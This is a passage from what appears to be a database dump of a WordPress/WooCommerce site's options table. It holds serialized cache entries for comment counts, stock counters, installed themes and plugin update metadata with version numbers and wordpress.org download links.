charset=UTF-8\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"⛄\";s:12:\"x-robots-tag\";s:15:\"noindex, follow\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 2\";}}s:5:\"build\";s:14:\"20190731095453\";}','no'),(456201,'_transient_as_comment_count','O:8:\"stdClass\":7:{s:14:\"total_comments\";i:0;s:3:\"all\";i:0;s:9:\"moderated\";i:0;s:8:\"approved\";i:0;s:4:\"spam\";i:0;s:5:\"trash\";i:0;s:12:\"post-trashed\";i:0;}','yes'),(456395,'_transient_wffgt_00000000000000000000ffffbca61473','1','no'),(454081,'_transient_rsssl_plusone_count','0','yes'),(454053,'_transient_wc_attribute_taxonomies','a:0:{}','yes'),(455994,'_transient_timeout_wc_low_stock_count','1569484297','no'),(455995,'_transient_wc_low_stock_count','0','no'),(455996,'_transient_timeout_wc_outofstock_count','1569484297','no'),(455997,'_transient_wc_outofstock_count','0','no'),(455793,'_transient_timeout_wc_term_counts','1569491816','no'),(455794,'_transient_wc_term_counts','a:73:{i:9;s:1:\"8\";i:18;s:1:\"4\";i:163;s:1:\"4\";i:10;s:1:\"5\";i:161;s:1:\"4\";i:162;s:1:\"4\";i:164;s:1:\"3\";i:81;s:1:\"5\";i:166;s:1:\"2\";i:101;s:1:\"1\";i:103;s:1:\"1\";i:92;s:1:\"3\";i:102;s:1:\"1\";i:167;s:1:\"1\";i:165;s:1:\"1\";i:170;s:1:\"0\";i:172;s:1:\"0\";i:16;s:1:\"1\";i:17;s:1:\"3\";i:7;s:1:\"4\";i:8;s:1:\"6\";i:12;s:1:\"1\";i:11;s:1:\"2\";i:96;s:1:\"1\";i:191;s:1:\"0\";i:190;s:1:\"0\";i:174;s:1:\"2\";i:180;s:1:\"2\";i:173;s:1:\"2\";i:97;s:1:\"1\";i:98;s:1:\"1\";i:99;s:1:\"1\";i:100;s:1:\"1\";i:61;s:1:\"1\";i:60;s:1:\"4\";i:63;s:1:\"1\";i:62;s:1:\"1\";i:49;s:1:\"1\";i:47;s:1:\"1\";i:48;s:1:\"1\";i:46;s:1:\"1\";i:50;s:1:\"1\";i:187;s:1:\"1\";i:79;s:1:\"1\";i:80;s:1:\"1\";i:78;s:1:\"1\";i:75;s:1:\"2\";i:76;s:1:\"3\";i:77;s:1:\"1\";i:74;s:1:\"2\";i:73;s:1:\"2\";i:58;s:1:\"1\";i:57;s:1:\"1\";i:110;s:1:\"1\";i:109;s:1:\"1\";i:59;s:1:\"1\";i:108;s:1:\"1\";i:68;s:1:\"2\";i:64;s:1:\"2\";i:69;s:1:\"1\";i:141;s:1:\"1\";i:139;s:1:\"1\";i:145;s:1:\"1\";i:140;s:1:\"1\";i:54;s:1:\"1\";i:55;s:1:\"1\";i:142;s:1:\"1\";i:135;s:1:\"1\";i:56;s:1:\"1\";i:137;s:1:\"1\";i:143;s:1:\"1\";i:136;s:1:\"1\";i:144;s:1:\"1\";}','no'),(449072,'_transient_timeout_wc_customer_bought_product_a87ff679a2f3e71d9181a67b7542122c','1567761472','no'),(449073,'_transient_wc_customer_bought_product_a87ff679a2f3e71d9181a67b7542122c','a:2:{s:7:\"version\";s:10:\"1564999098\";s:5:\"value\";a:0:{}}','no'),(456200,'_transient_wc_count_comments','O:8:\"stdClass\":7:{s:14:\"total_comments\";i:0;s:3:\"all\";i:0;s:9:\"moderated\";i:0;s:8:\"approved\";i:0;s:4:\"spam\";i:0;s:5:\"trash\";i:0;s:12:\"post-trashed\";i:0;}','yes'),(454120,'_site_transient_timeout_browser_666332998c62658cc43216116351bf1f','1567083712','no'),(454121,'_site_transient_browser_666332998c62658cc43216116351bf1f','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"76.0.3809.100\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(455385,'_transient_timeout_external_ip_address_216.151.180.72','1567405640','no'),(455386,'_transient_external_ip_address_216.151.180.72','199.250.217.130','no'),(456394,'_transient_timeout_wffgt_00000000000000000000ffffbca61473','1567066851','no'),(456365,'_site_transient_timeout_theme_roots','1567021855','no'),(456366,'_site_transient_theme_roots','a:5:{s:14:\"ChildThemeDivi\";s:7:\"/themes\";s:4:\"Divi\";s:7:\"/themes\";s:14:\"twentynineteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";}','no'),(456367,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1567020055;s:7:\"checked\";a:26:{s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:3:\"7.5\";s:91:\"all-in-one-wp-migration-unlimited-extension/all-in-one-wp-migration-unlimited-extension.php\";s:4:\"2.31\";s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";s:5:\"3.2.4\";s:67:\"autocomplete-woocommerce-orders/autocomplete-woocommerce-orders.php\";s:5:\"1.1.0\";s:15:\"bloom/bloom.php\";s:6:\"1.3.10\";s:23:\"cartflows/cartflows.php\";s:5:\"1.2.5\";s:31:\"cartflows-pro/cartflows-pro.php\";s:5:\"1.2.1\";s:31:\"code-snippets/code-snippets.php\";s:6:\"2.13.3\";s:27:\"coming-soon/coming-soon.php\";s:6:\"5.0.26\";s:97:\"yikes-inc-easy-custom-woocommerce-product-tabs/yikes-inc-easy-custom-woocommerce-product-tabs.php\";s:6:\"1.6.10\";s:63:\"es-woocommerce-activecampaign/es-woocommerce-activecampaign.php\";s:6:\"1.9.11\";s:115:\"finale-woocommerce-sales-countdown-timer-discount/finale-woocommerce-sales-countdown-timer-discount-plugin-lite.php\";s:6:\"2.10.0\";s:36:\"google-sitemap-generator/sitemap.php\";s:5:\"4.1.0\";s:25:\"hurrytimer/hurrytimer.php\";s:5:\"2.2.8\";s:37:\"rocket-lazy-load/rocket-lazy-load.php\";s:5:\"2.2.3\";s:50:\"official-facebook-pixel/facebook-for-wordpress.php\";s:6:\"1.7.25\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:5:\"3.2.5\";s:45:\"shortpixel-adaptive-images/short-pixel-ai.php\";s:5:\"1.2.5\";s:39:\"woocommerce-admin/woocommerce-admin.php\";s:6:\"0.17.0\";s:69:\"woo-gutenberg-products-block/woocommerce-gutenberg-products-block.php\";s:5:\"2.3.0\";s:63:\"woo-cart-abandonment-recovery/woo-cart-abandonment-recovery.php\";s:5:\"1.1.7\";s:85:\"woocommerce-google-analytics-integration/woocommerce-google-analytics-integration.php\";s:6:\"1.4.12\";s:47:\"woocommerce-payfast-gateway/gateway-payfast.php\";s:6:\"1.4.13\";s:38:\"woocommerce-pdf-invoices/bootstrap.php\";s:5:\"3.0.7\";s:23:\"wordfence/wordfence.php\";s:5:\"7.4.0\";s:27:\"wp-optimize/wp-optimize.php\";s:6:\"3.0.11\";}s:8:\"response\";a:3:{s:23:\"cartflows/cartflows.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/cartflows\";s:4:\"slug\";s:9:\"cartflows\";s:6:\"plugin\";s:23:\"cartflows/cartflows.php\";s:11:\"new_version\";s:5:\"1.2.6\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/cartflows/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/cartflows.1.2.6.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:54:\"https://ps.w.org/cartflows/assets/icon.svg?rev=1994833\";s:3:\"svg\";s:54:\"https://ps.w.org/cartflows/assets/icon.svg?rev=1994833\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/cartflows/assets/banner-1544x500.jpg?rev=1994833\";s:2:\"1x\";s:64:\"https://ps.w.org/cartflows/assets/banner-772x250.jpg?rev=1994833\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.2.2\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:45:\"shortpixel-adaptive-images/short-pixel-ai.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:40:\"w.org/plugins/shortpixel-adaptive-images\";s:4:\"slug\";s:26:\"shortpixel-adaptive-images\";s:6:\"plugin\";s:45:\"shortpixel-adaptive-images/short-pixel-ai.php\";s:11:\"new_version\";s:5:\"1.2.6\";s:3:\"url\";s:57:\"https://wordpress.org/plugins/shortpixel-adaptive-images/\";s:7:\"package\";s:75:\"https://downloads.wordpress.org/plugin/shortpixel-adaptive-images.1.2.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/shortpixel-adaptive-images/assets/icon-256x256.png?rev=1989833\";s:2:\"1x\";s:79:\"https://ps.w.org/shortpixel-adaptive-images/assets/icon-128x128.png?rev=1989833\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:82:\"https://ps.w.org/shortpixel-adaptive-images/assets/banner-1544x500.png?rev=1989833\";s:2:\"1x\";s:81:\"https://ps.w.org/shortpixel-adaptive-images/assets/banner-772x250.png?rev=1989833\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.2.2\";s:12:\"requires_php\";s:3:\"5.2\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:69:\"woo-gutenberg-products-block/woocommerce-gutenberg-products-block.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:42:\"w.org/plugins/woo-gutenberg-products-block\";s:4:\"slug\";s:28:\"woo-gutenberg-products-block\";s:6:\"plugin\";s:69:\"woo-gutenberg-products-block/woocommerce-gutenberg-products-block.php\";s:11:\"new_version\";s:5:\"2.3.1\";s:3:\"url\";s:59:\"https://wordpress.org/plugins/woo-gutenberg-products-block/\";s:7:\"package\";s:77:\"https://downloads.wordpress.org/plugin/woo-gutenberg-products-block.2.3.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:81:\"https://ps.w.org/woo-gutenberg-products-block/assets/icon-256x256.png?rev=1863757\";s:2:\"1x\";s:81:\"https://ps.w.org/woo-gutenberg-products-block/assets/icon-128x128.png?rev=1863757\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:83:\"https://ps.w.org/woo-gutenberg-products-block/assets/banner-772x250.png?rev=1863757\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.2.2\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:20:{s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:37:\"w.org/plugins/all-in-one-wp-migration\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:6:\"plugin\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:11:\"new_version\";s:3:\"7.5\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/all-in-one-wp-migration/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/all-in-one-wp-migration.7.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-256x256.png?rev=2097157\";s:2:\"1x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-128x128.png?rev=2097157\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-1544x500.png?rev=2097157\";s:2:\"1x\";s:78:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-772x250.png?rev=2097157\";}s:11:\"banners_rtl\";a:0:{}}s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:33:\"w.org/plugins/all-in-one-seo-pack\";s:4:\"slug\";s:19:\"all-in-one-seo-pack\";s:6:\"plugin\";s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";s:11:\"new_version\";s:5:\"3.2.4\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/all-in-one-seo-pack/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/all-in-one-seo-pack.3.2.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/all-in-one-seo-pack/assets/icon-256x256.png?rev=2075006\";s:2:\"1x\";s:72:\"https://ps.w.org/all-in-one-seo-pack/assets/icon-128x128.png?rev=2075006\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/all-in-one-seo-pack/assets/banner-1544x500.png?rev=1354894\";s:2:\"1x\";s:74:\"https://ps.w.org/all-in-one-seo-pack/assets/banner-772x250.png?rev=1354894\";}s:11:\"banners_rtl\";a:0:{}}s:67:\"autocomplete-woocommerce-orders/autocomplete-woocommerce-orders.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:45:\"w.org/plugins/autocomplete-woocommerce-orders\";s:4:\"slug\";s:31:\"autocomplete-woocommerce-orders\";s:6:\"plugin\";s:67:\"autocomplete-woocommerce-orders/autocomplete-woocommerce-orders.php\";s:11:\"new_version\";s:5:\"1.1.0\";s:3:\"url\";s:62:\"https://wordpress.org/plugins/autocomplete-woocommerce-orders/\";s:7:\"package\";s:74:\"https://downloads.wordpress.org/plugin/autocomplete-woocommerce-orders.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:84:\"https://ps.w.org/autocomplete-woocommerce-orders/assets/icon-256x256.png?rev=1772218\";s:2:\"1x\";s:84:\"https://ps.w.org/autocomplete-woocommerce-orders/assets/icon-128x128.png?rev=1772218\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:87:\"https://ps.w.org/autocomplete-woocommerce-orders/assets/banner-1544x500.png?rev=1772218\";s:2:\"1x\";s:86:\"https://ps.w.org/autocomplete-woocommerce-orders/assets/banner-772x250.png?rev=1772218\";}s:11:\"banners_rtl\";a:0:{}}s:31:\"code-snippets/code-snippets.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:27:\"w.org/plugins/code-snippets\";s:4:\"slug\";s:13:\"code-snippets\";s:6:\"plugin\";s:31:\"code-snippets/code-snippets.php\";s:11:\"new_version\";s:6:\"2.13.3\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/code-snippets/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/code-snippets.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:57:\"https://ps.w.org/code-snippets/assets/icon.svg?rev=986370\";s:3:\"svg\";s:57:\"https://ps.w.org/code-snippets/assets/icon.svg?rev=986370\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/code-snippets/assets/banner-772x250.png?rev=1490174\";}s:11:\"banners_rtl\";a:0:{}}s:27:\"coming-soon/coming-soon.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/coming-soon\";s:4:\"slug\";s:11:\"coming-soon\";s:6:\"plugin\";s:27:\"coming-soon/coming-soon.php\";s:11:\"new_version\";s:6:\"5.0.26\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/coming-soon/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/coming-soon.5.0.26.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/coming-soon/assets/icon-256x256.jpg?rev=971699\";s:2:\"1x\";s:64:\"https://ps.w.org/coming-soon/assets/icon-128x128.png?rev=1606731\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/coming-soon/assets/banner-772x250.jpg?rev=1368003\";}s:11:\"banners_rtl\";a:0:{}}s:97:\"yikes-inc-easy-custom-woocommerce-product-tabs/yikes-inc-easy-custom-woocommerce-product-tabs.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:60:\"w.org/plugins/yikes-inc-easy-custom-woocommerce-product-tabs\";s:4:\"slug\";s:46:\"yikes-inc-easy-custom-woocommerce-product-tabs\";s:6:\"plugin\";s:97:\"yikes-inc-easy-custom-woocommerce-product-tabs/yikes-inc-easy-custom-woocommerce-product-tabs.php\";s:11:\"new_version\";s:6:\"1.6.10\";s:3:\"url\";s:77:\"https://wordpress.org/plugins/yikes-inc-easy-custom-woocommerce-product-tabs/\";s:7:\"package\";s:96:\"https://downloads.wordpress.org/plugin/yikes-inc-easy-custom-woocommerce-product-tabs.1.6.10.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:99:\"https://ps.w.org/yikes-inc-easy-custom-woocommerce-product-tabs/assets/icon-256x256.png?rev=1558461\";s:2:\"1x\";s:99:\"https://ps.w.org/yikes-inc-easy-custom-woocommerce-product-tabs/assets/icon-128x128.png?rev=1558461\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:102:\"https://ps.w.org/yikes-inc-easy-custom-woocommerce-product-tabs/assets/banner-1544x500.png?rev=1558461\";s:2:\"1x\";s:101:\"https://ps.w.org/yikes-inc-easy-custom-woocommerce-product-tabs/assets/banner-772x250.png?rev=1558478\";}s:11:\"banners_rtl\";a:0:{}}s:63:\"es-woocommerce-activecampaign/es-woocommerce-activecampaign.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:43:\"w.org/plugins/es-woocommerce-activecampaign\";s:4:\"slug\";s:29:\"es-woocommerce-activecampaign\";s:6:\"plugin\";s:63:\"es-woocommerce-activecampaign/es-woocommerce-activecampaign.php\";s:11:\"new_version\";s:6:\"1.9.11\";s:3:\"url\";s:60:\"https://wordpress.org/plugins/es-woocommerce-activecampaign/\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/plugin/es-woocommerce-activecampaign.1.9.11.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:82:\"https://ps.w.org/es-woocommerce-activecampaign/assets/icon-256x256.png?rev=1591089\";s:2:\"1x\";s:82:\"https://ps.w.org/es-woocommerce-activecampaign/assets/icon-128x128.png?rev=1591089\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:85:\"https://ps.w.org/es-woocommerce-activecampaign/assets/banner-1544x500.png?rev=1590977\";s:2:\"1x\";s:84:\"https://ps.w.org/es-woocommerce-activecampaign/assets/banner-772x250.png?rev=1590977\";}s:11:\"banners_rtl\";a:0:{}}s:115:\"finale-woocommerce-sales-countdown-timer-discount/finale-woocommerce-sales-countdown-timer-discount-plugin-lite.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:63:\"w.org/plugins/finale-woocommerce-sales-countdown-timer-discount\";s:4:\"slug\";s:49:\"finale-woocommerce-sales-countdown-timer-discount\";s:6:\"plugin\";s:115:\"finale-woocommerce-sales-countdown-timer-discount/finale-woocommerce-sales-countdown-timer-discount-plugin-lite.php\";s:11:\"new_version\";s:6:\"2.10.0\";s:3:\"url\";s:80:\"https://wordpress.org/plugins/finale-woocommerce-sales-countdown-timer-discount/\";s:7:\"package\";s:99:\"https://downloads.wordpress.org/plugin/finale-woocommerce-sales-countdown-timer-discount.2.10.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:102:\"https://ps.w.org/finale-woocommerce-sales-countdown-timer-discount/assets/icon-256x256.jpg?rev=1659516\";s:2:\"1x\";s:102:\"https://ps.w.org/finale-woocommerce-sales-countdown-timer-discount/assets/icon-128x128.jpg?rev=1659516\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:105:\"https://ps.w.org/finale-woocommerce-sales-countdown-timer-discount/assets/banner-1544x500.jpg?rev=1760065\";s:2:\"1x\";s:104:\"https://ps.w.org/finale-woocommerce-sales-countdown-timer-discount/assets/banner-772x250.jpg?rev=1760095\";}s:11:\"banners_rtl\";a:0:{}}s:36:\"google-sitemap-generator/sitemap.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/google-sitemap-generator\";s:4:\"slug\";s:24:\"google-sitemap-generator\";s:6:\"plugin\";s:36:\"google-sitemap-generator/sitemap.php\";s:11:\"new_version\";s:5:\"4.1.0\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/google-sitemap-generator/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/google-sitemap-generator.4.1.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/google-sitemap-generator/assets/icon-256x256.png?rev=1701944\";s:2:\"1x\";s:77:\"https://ps.w.org/google-sitemap-generator/assets/icon-128x128.png?rev=1701944\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:79:\"https://ps.w.org/google-sitemap-generator/assets/banner-772x250.png?rev=1701944\";}s:11:\"banners_rtl\";a:0:{}}s:25:\"hurrytimer/hurrytimer.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:24:\"w.org/plugins/hurrytimer\";s:4:\"slug\";s:10:\"hurrytimer\";s:6:\"plugin\";s:25:\"hurrytimer/hurrytimer.php\";s:11:\"new_version\";s:5:\"2.2.8\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/hurrytimer/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/hurrytimer.2.2.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/hurrytimer/assets/icon-256x256.png?rev=2051519\";s:2:\"1x\";s:63:\"https://ps.w.org/hurrytimer/assets/icon-256x256.png?rev=2051519\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/hurrytimer/assets/banner-1544x500.jpg?rev=2119695\";s:2:\"1x\";s:65:\"https://ps.w.org/hurrytimer/assets/banner-772x250.jpg?rev=2119695\";}s:11:\"banners_rtl\";a:0:{}}s:37:\"rocket-lazy-load/rocket-lazy-load.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:30:\"w.org/plugins/rocket-lazy-load\";s:4:\"slug\";s:16:\"rocket-lazy-load\";s:6:\"plugin\";s:37:\"rocket-lazy-load/rocket-lazy-load.php\";s:11:\"new_version\";s:5:\"2.2.3\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/rocket-lazy-load/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/rocket-lazy-load.2.2.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/rocket-lazy-load/assets/icon-256x256.png?rev=1776193\";s:2:\"1x\";s:69:\"https://ps.w.org/rocket-lazy-load/assets/icon-128x128.png?rev=1776193\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:71:\"https://ps.w.org/rocket-lazy-load/assets/banner-772x250.png?rev=1776193\";}s:11:\"banners_rtl\";a:0:{}}s:50:\"official-facebook-pixel/facebook-for-wordpress.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:37:\"w.org/plugins/official-facebook-pixel\";s:4:\"slug\";s:23:\"official-facebook-pixel\";s:6:\"plugin\";s:50:\"official-facebook-pixel/facebook-for-wordpress.php\";s:11:\"new_version\";s:6:\"1.7.25\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/official-facebook-pixel/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/official-facebook-pixel.1.7.25.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:68:\"https://ps.w.org/official-facebook-pixel/assets/icon.svg?rev=1969511\";s:3:\"svg\";s:68:\"https://ps.w.org/official-facebook-pixel/assets/icon.svg?rev=1969511\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:31:\"w.org/plugins/really-simple-ssl\";s:4:\"slug\";s:17:\"really-simple-ssl\";s:6:\"plugin\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:11:\"new_version\";s:5:\"3.2.5\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/really-simple-ssl/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/really-simple-ssl.3.2.5.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/really-simple-ssl/assets/icon-128x128.png?rev=1782452\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:72:\"https://ps.w.org/really-simple-ssl/assets/banner-772x250.jpg?rev=1881345\";}s:11:\"banners_rtl\";a:0:{}}s:39:\"woocommerce-admin/woocommerce-admin.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:31:\"w.org/plugins/woocommerce-admin\";s:4:\"slug\";s:17:\"woocommerce-admin\";s:6:\"plugin\";s:39:\"woocommerce-admin/woocommerce-admin.php\";s:11:\"new_version\";s:6:\"0.17.0\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/woocommerce-admin/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/woocommerce-admin.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/woocommerce-admin/assets/icon-256x256.jpg?rev=2057866\";s:2:\"1x\";s:70:\"https://ps.w.org/woocommerce-admin/assets/icon-128x128.jpg?rev=2057866\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/woocommerce-admin/assets/banner-1544x500.jpg?rev=2057866\";s:2:\"1x\";s:72:\"https://ps.w.org/woocommerce-admin/assets/banner-772x250.jpg?rev=2057866\";}s:11:\"banners_rtl\";a:0:{}}s:63:\"woo-cart-abandonment-recovery/woo-cart-abandonment-recovery.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:43:\"w.org/plugins/woo-cart-abandonment-recovery\";s:4:\"slug\";s:29:\"woo-cart-abandonment-recovery\";s:6:\"plugin\";s:63:\"woo-cart-abandonment-recovery/woo-cart-abandonment-recovery.php\";s:11:\"new_version\";s:5:\"1.1.7\";s:3:\"url\";s:60:\"https://wordpress.org/plugins/woo-cart-abandonment-recovery/\";s:7:\"package\";s:78:\"https://downloads.wordpress.org/plugin/woo-cart-abandonment-recovery.1.1.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:82:\"https://ps.w.org/woo-cart-abandonment-recovery/assets/icon-256x256.png?rev=2096894\";s:2:\"1x\";s:82:\"https://ps.w.org/woo-cart-abandonment-recovery/assets/icon-128x128.png?rev=2096894\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:85:\"https://ps.w.org/woo-cart-abandonment-recovery/assets/banner-1544x500.png?rev=2096894\";s:2:\"1x\";s:84:\"https://ps.w.org/woo-cart-abandonment-recovery/assets/banner-772x250.png?rev=2096894\";}s:11:\"banners_rtl\";a:0:{}}s:85:\"woocommerce-google-analytics-integration/woocommerce-google-analytics-integration.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:54:\"w.org/plugins/woocommerce-google-analytics-integration\";s:4:\"slug\";s:40:\"woocommerce-google-analytics-integration\";s:6:\"plugin\";s:85:\"woocommerce-google-analytics-integration/woocommerce-google-analytics-integration.php\";s:11:\"new_version\";s:6:\"1.4.12\";s:3:\"url\";s:71:\"https://wordpress.org/plugins/woocommerce-google-analytics-integration/\";s:7:\"package\";s:90:\"https://downloads.wordpress.org/plugin/woocommerce-google-analytics-integration.1.4.12.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:93:\"https://ps.w.org/woocommerce-google-analytics-integration/assets/icon-256x256.png?rev=1909975\";s:2:\"1x\";s:93:\"https://ps.w.org/woocommerce-google-analytics-integration/assets/icon-128x128.png?rev=1909975\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:96:\"https://ps.w.org/woocommerce-google-analytics-integration/assets/banner-1544x500.png?rev=1909975\";s:2:\"1x\";s:95:\"https://ps.w.org/woocommerce-google-analytics-integration/assets/banner-772x250.png?rev=1909975\";}s:11:\"banners_rtl\";a:0:{}}s:47:\"woocommerce-payfast-gateway/gateway-payfast.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:41:\"w.org/plugins/woocommerce-payfast-gateway\";s:4:\"slug\";s:27:\"woocommerce-payfast-gateway\";s:6:\"plugin\";s:47:\"woocommerce-payfast-gateway/gateway-payfast.php\";s:11:\"new_version\";s:6:\"1.4.13\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/woocommerce-payfast-gateway/\";s:7:\"package\";s:77:\"https://downloads.wordpress.org/plugin/woocommerce-payfast-gateway.1.4.13.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/woocommerce-payfast-gateway/assets/icon-256x256.png?rev=1871016\";s:2:\"1x\";s:80:\"https://ps.w.org/woocommerce-payfast-gateway/assets/icon-128x128.png?rev=1871016\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:83:\"https://ps.w.org/woocommerce-payfast-gateway/assets/banner-1544x500.png?rev=1871016\";s:2:\"1x\";s:82:\"https://ps.w.org/woocommerce-payfast-gateway/assets/banner-772x250.png?rev=1871016\";}s:11:\"banners_rtl\";a:0:{}}s:38:\"woocommerce-pdf-invoices/bootstrap.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/woocommerce-pdf-invoices\";s:4:\"slug\";s:24:\"woocommerce-pdf-invoices\";s:6:\"plugin\";s:38:\"woocommerce-pdf-invoices/bootstrap.php\";s:11:\"new_version\";s:5:\"3.0.7\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/woocommerce-pdf-invoices/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/woocommerce-pdf-invoices.3.0.7.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:77:\"https://ps.w.org/woocommerce-pdf-invoices/assets/icon-128x128.png?rev=1128583\";}s:7:\"banners\";a:1